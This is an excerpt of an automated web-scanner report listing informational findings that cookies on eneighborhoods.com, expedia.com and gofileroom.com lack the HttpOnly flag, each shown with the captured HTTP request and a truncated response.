var pkg=new menuPackage(menuName,0,0,0,0,0,1,0,0,1);
/*s*
...[SNIP]...
18.194. http://www.eneighborhoods.com/menumachine/eneighborhoodshomemenu2/menuspecs.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /menumachine/eneighborhoodshomemenu2/menuspecs.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /menumachine/eneighborhoodshomemenu2/menuspecs.js HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 200 OK
Content-Length: 5780
Content-Type: application/x-javascript
Last-Modified: Tue, 06 Jul 2010 21:11:57 GMT
Accept-Ranges: bytes
ETag: "808cbddd4f1dcb1:660"
Date: Fri, 06 May 2011 18:40:25 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

/*
MenuMachine 2 definition file - do not edit. http://menumachine.com
2.2.1 :: eNeighborhoodsHomeMenu2
*/
var menuName="eneighborhoodshomemenu2";
var pkg=new menuPackage(menuName,0,0,0,0,0,1,0,0,1);

...[SNIP]...
18.195. http://www.eneighborhoods.com/menumachine/menumachine2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /menumachine/menumachine2.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /menumachine/menumachine2.js HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 200 OK
Content-Length: 20128
Content-Type: application/x-javascript
Last-Modified: Mon, 28 May 2007 01:33:43 GMT
Accept-Ranges: bytes
ETag: "80f5fa39c8a0c71:660"
Date: Fri, 06 May 2011 18:40:24 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

//MenuMachine 2 (v2.2.1) Copyright 2007 Big Bang Software All Rights Reserved
var _u="undefined",__M=Math,__P=parseInt;if(typeof(_)==_u){scriptStart=new Date();__menuHolder=new ___mh();_sTs="<script t
...[SNIP]...
18.196. http://www.expedia.com/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /default.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /default.asp HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Cteonnt-Length: 69466
Content-Type: text/html; Charset=iso-8859-1
Cache-Control: private
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:33:31 GMT
Connection: close
Set-Cookie: ipsnf3=v.3|US|1|511|washington; expires=Sun, 6-May-2012 00:00:01 GMT; path=/; domain=.expedia.com;
Set-Cookie: MC1=GUID=6EAD9261B09A4968ABBC2BAA8521F2DD; expires=Fri, 06-May-2016 07:00:00 GMT; domain=.expedia.com; path=/
Set-Cookie: COOKIECHECK=1; domain=.expedia.com; path=/
Content-Length: 69466


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<COMMENT TITLE="MO
...[SNIP]...
18.197. http://www.expedia.com/pub/agent.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pub/agent.dll?qscr=info HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11; ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:35:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: jscript=1; Domain=.expedia.com; path=/
Set-Cookie: s1=`user=v.8,0,EX01235ACD77$E5$B5201000D$27$E96!G0.!5010$2302!50$ED$A3$27$0C7$85$FE$36!4$FF!e02000`95; Domain=.expedia.com; path=/
Set-Cookie: p1=`tpid=v.1,1`accttype=v.2,3,1,EX01F1458A8B$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ek$16$E4$24p$5B$39$89$91H`104; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 43196


                                                                           <META HTTP-EQUIV="Content-Type" content="text/html; c
...[SNIP]...
18.198. https://www.expedia.com/pub/agent.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pub/agent.dll?qscr=fbak&&zz=1247500409281&&zz=1304739644741 HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=fbak&&zz=1247500409281
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819496`188; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DFAQ%25252520Support%2525253ASearch%25252520Results%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.expedia.com/pub/agent.dll%2525253Fqscr%2525253Dfbak%25252526%25252526zz%2525253D1247500409281%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B; s1=`user=v.8,0,EX01CC562A07$F4$B5203000g$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50K$A9$11$90$F1$8C$A5$D1$82$AB$89$FB!e02000`133

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:40:52 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: s1=`user=v.8,0,EX0183E3F010$F4$B5204000k$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$83$A7rJ$D3$B5$CD3$82$AB$89$FB!e02000`129; Domain=.expedia.com; path=/
Set-Cookie: p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`airp=v.1,AUS`gacct=v.1,1,215819496`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`188; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 155628


                                                                           <META HTTP-EQUIV="Content-Type" content="text/html; c
...[SNIP]...
18.199. http://www.gofileroom.com/includes/css/main.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gofileroom.com
Path:   /includes/css/main.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/css/main.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gofileroom.com

Response

HTTP/1.1 200 OK
Content-Length: 789
Content-Type: text/css
Expires: Sun, 29 May 2011 05:00:00 GMT
Last-Modified: Tue, 30 Sep 2003 19:12:32 GMT
Accept-Ranges: bytes
ETag: "01055cc8687c31:5392"
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:22:48 GMT
Set-Cookie: BIGipServerGFR_WWW_HTTP=3090734602.20480.0000; path=/

BODY
{
MARGIN: 0px;
FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif;
BACKGROUND-COLOR: #003366
}
TD
{
PADDING-RIGHT: 0px;
PADDING-LEFT: 0px;
PADDING-BOTTOM: 0px;

...[SNIP]...
18.200. http://www.gofileroom.com/includes/js/GFRAJAX.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gofileroom.com
Path:   /includes/js/GFRAJAX.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/js/GFRAJAX.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gofileroom.com

Response

HTTP/1.1 200 OK
Content-Length: 2689
Content-Type: application/x-javascript
Expires: Sun, 29 May 2011 05:00:00 GMT
Last-Modified: Sun, 07 Jan 2007 18:04:32 GMT
Accept-Ranges: bytes
ETag: "0b819488632c71:66c2"
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:23:03 GMT
Set-Cookie: BIGipServerGFR_WWW_HTTP=3191397898.20480.0000; path=/

// JScript File

var arrpendingCallbacks = new Array();
var intsynchronousCallBackIndex = -1;
function DoCallback(strUrl, strXML, callBackFunction, errorCallbackFunction, useAsync) {
//callBa
...[SNIP]...
18.201. http://www.gofileroom.com/includes/js/login.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gofileroom.com
Path:   /includes/js/login.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/js/login.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gofileroom.com

Response

HTTP/1.1 200 OK
Content-Length: 76
Content-Type: application/x-javascript
Expires: Sun, 29 May 2011 05:00:00 GMT
Last-Modified: Thu, 10 Nov 2005 03:34:06 GMT
Accept-Ranges: bytes
ETag: "04b3e9aa7e5c51:52e4"
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:22:42 GMT
Set-Cookie: BIGipServerGFR_WWW_HTTP=3040402954.20480.0000; path=/

var protocol = "https://"
var server = "www.gofileroom.com"
var vRoot = ""
18.202. http://www.gofileroom.com/includes/js/loginfunctions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gofileroom.com
Path:   /includes/js/loginfunctions.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/js/loginfunctions.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gofileroom.com

Response

HTTP/1.1 200 OK
Content-Length: 1734
Content-Type: application/x-javascript
Expires: Sun, 29 May 2011 05:00:00 GMT
Last-Modified: Tue, 28 Oct 2008 19:20:48 GMT
Accept-Ranges: bytes
ETag: "0e83e483239c91:2807"
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:22:44 GMT
Set-Cookie: BIGipServerGFR_WWW_HTTP=3224952330.20480.0000; path=/

...function forgotPassword() {
   document.body.focus();
   if (window.frmlogin.prcd.value == "") {
       alert("Please enter your login.");
       window.frmlogin.prcd.focus();
       return;
   }
   
   if (!confir
...[SNIP]...
18.203. http://www.gofileroom.com/lbmc/css/DocAudit.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gofileroom.com
Path:   /lbmc/css/DocAudit.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lbmc/css/DocAudit.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gofileroom.com

Response

HTTP/1.1 200 OK
Content-Length: 2187
Content-Type: text/css
Last-Modified: Thu, 21 Dec 2006 05:32:58 GMT
Accept-Ranges: bytes
ETag: "0a1f578c124c71:2cd4"
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:22:43 GMT
Set-Cookie: BIGipServerGFR_WWW_HTTP=3241729546.20480.0000; path=/

.text_blue
{
   font-size: 13px;
   font-family: Verdana;
   color: #002C6B;
}
.text_white2
{
   font-size: 13px;
   font-family: Verdana;
   color:white;
}
.text_white
{
   font-size: 10px;
   font-fa
...[SNIP]...
18.204. http://www.gofileroom.com/lbmc/images/LBMC%20horizontal%20blue.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gofileroom.com
Path:   /lbmc/images/LBMC%20horizontal%20blue.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lbmc/images/LBMC%20horizontal%20blue.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gofileroom.com

Response

HTTP/1.1 200 OK
Content-Length: 28050
Content-Type: image/jpeg
Last-Modified: Thu, 21 Dec 2006 04:33:18 GMT
Accept-Ranges: bytes
ETag: "0fb1c23b924c71:37a4f"
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:22:49 GMT
Set-Cookie: BIGipServerGFR_WWW_HTTP=2251873802.20480.0000; path=/

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2006:12:11 11:55:27..........
...[SNIP]...
18.205. http://www.gofileroom.com/lbmc/images/angle3a.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gofileroom.com
Path:   /lbmc/images/angle3a.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lbmc/images/angle3a.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gofileroom.com

Response

HTTP/1.1 200 OK
Content-Length: 867
Content-Type: image/gif
Last-Modified: Fri, 24 Oct 2008 21:17:37 GMT
Accept-Ranges: bytes
ETag: "181b70f01d36c91:20799"
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:23:00 GMT
Set-Cookie: BIGipServerGFR_WWW_HTTP=2268651018.20480.0000; path=/

GIF89a..............3f..................................................................................................................................................................................
...[SNIP]...
18.206. http://www.gofileroom.com/lbmc/images/angle3b.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gofileroom.com
Path:   /lbmc/images/angle3b.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lbmc/images/angle3b.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gofileroom.com

Response

HTTP/1.1 200 OK
Content-Length: 867
Content-Type: image/gif
Last-Modified: Fri, 24 Oct 2008 21:18:28 GMT
Accept-Ranges: bytes
ETag: "06aaee1e36c91:2716"
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:22:53 GMT
Set-Cookie: BIGipServerGFR_WWW_HTTP=3342392842.20480.0000; path=/

GIF89a.............3f...................................................................................................................................................................................
...[SNIP]...
18.207. http://www.gofileroom.com/lbmc/images/button2A.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gofileroom.com
Path:   /lbmc/images/button2A.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lbmc/images/button2A.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gofileroom.com

Response

HTTP/1.1 200 OK
Content-Length: 360
Content-Type: image/gif
Last-Modified: Mon, 08 Dec 2008 08:09:48 GMT
Accept-Ranges: bytes
ETag: "02e5a56c59c91:6f8d"
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:23:01 GMT
Set-Cookie: BIGipServerGFR_WWW_HTTP=3174620682.20480.0000; path=/

GIF89aP......LH9.....r...jePys[=:.-+"...........g..}[VD......!.......,....P........I..8....`(.di.h*.l...
.t.v...[..."...\....c...O.!@......\..(..;R.$d...p...C..8o...@....C#..    .c!k.ZQ?
EGz
O.]...-~&OU
...[SNIP]...
18.208. http://www.gofileroom.com/lbmc/images/check.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gofileroom.com
Path:   /lbmc/images/check.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lbmc/images/check.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gofileroom.com

Response

HTTP/1.1 200 OK
Content-Length: 586
Content-Type: image/gif
Last-Modified: Mon, 08 Dec 2008 07:22:40 GMT
Accept-Ranges: bytes
ETag: "0a0bbc0559c91:338c5"
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:22:51 GMT
Set-Cookie: BIGipServerGFR_WWW_HTTP=2218319370.20480.0000; path=/

GIF89ak......0ew`..............p..............g.."b{;w.H.....x.....X.....
FXP|.... Yl...@q./l.....Mb.........!.......,....k......`.mdi.b..l..p,..io.F.|....fH$2r+K....:.N.'..Z......6.[.. .,.n...D.....
...[SNIP]...
18.209. http://www.gofileroom.com/lbmc/images/dottedlinevert2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gofileroom.com
Path:   /lbmc/images/dottedlinevert2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lbmc/images/dottedlinevert2.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gofileroom.com

Response

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:23:02 GMT
Set-Cookie: BIGipServerGFR_WWW_HTTP=3292061194.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
18.210. http://www.gofileroom.com/lbmc/images/s-key.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gofileroom.com
Path:   /lbmc/images/s-key.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lbmc/images/s-key.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gofileroom.com

Response

HTTP/1.1 200 OK
Content-Length: 1657
Content-Type: image/gif
Last-Modified: Thu, 21 Dec 2006 04:33:22 GMT
Accept-Ranges: bytes
ETag: "0557f25b924c71:66f5"
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:22:45 GMT
Set-Cookie: BIGipServerGFR_WWW_HTTP=3057180170.20480.0000; path=/

GIF89a8.M....Z[Z........................rvr..........................................bbbzzz............lnl...!...
...,....8.M.....'.di.h..l..p,.tm.x..|.....A"~ .....x.....8Z..[...V..H`P@0
..%.(.."....
...[SNIP]...
18.211. http://www.gofileroom.com/lbmc/images/softwareInstalled.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gofileroom.com
Path:   /lbmc/images/softwareInstalled.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lbmc/images/softwareInstalled.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gofileroom.com

Response

HTTP/1.1 200 OK
Content-Length: 571
Content-Type: image/gif
Last-Modified: Mon, 24 Feb 2003 03:22:44 GMT
Accept-Ranges: bytes
ETag: "0dac8feb3dbc21:5f63"
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:23:02 GMT
Set-Cookie: BIGipServerGFR_WWW_HTTP=3157843466.20480.0000; path=/

GIF89a..}.............4g.Bq.O{.]..j..x.......................................................................,......}.@... .di..2..i.p..tq.....C... A$.G.D..@....sjb&~.....Q....J.....m....3 ..5$.G.S_..
...[SNIP]...
